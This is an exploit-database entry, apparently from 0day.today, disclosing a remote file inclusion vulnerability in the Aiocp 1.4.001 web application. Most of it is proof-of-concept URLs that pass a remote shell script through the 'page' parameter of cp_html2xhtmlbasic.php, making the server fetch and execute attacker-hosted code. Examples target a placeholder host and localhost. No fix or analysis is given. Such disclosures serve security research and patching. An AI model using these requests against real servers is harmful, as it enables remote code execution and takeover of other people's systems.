id: 9885
date: 10/07/2009
title: Aiocp 1.4.001 File Inclusion Vulnerability
author: Hadi Kiamarsi
cves: 

==========================================
Aiocp 1.4.001 File Inclusion Vulnerability
==========================================

###########################################
 
#
 
# Aiocp 1.4.001 Remote File Inclusion vulnerability
 
#
 
# Found by : Hadi Kiamarsi
 
#
# Download : http://sourceforge.net/projects/aiocp/files/aiocp/AIOCP%201.4.001/aiocp_1_4_001.zip/download
 
#
 
###########################################
 
PoC :
 
http://[TARGET]/[PATH]/public/code/cp_html2xhtmlbasic.php?page=[SHELL]
 
example :
 
http://[TARGET]/[PATH]/public/code/cp_html2xhtmlbasic.php?page=http://www.example.com/shell.php
 
local Example :
 
http://localhost/root/public/code/cp_html2xhtmlbasic.php?page=http://127.0.0.1/shell.php



#  0day.today [2023-03-23]  #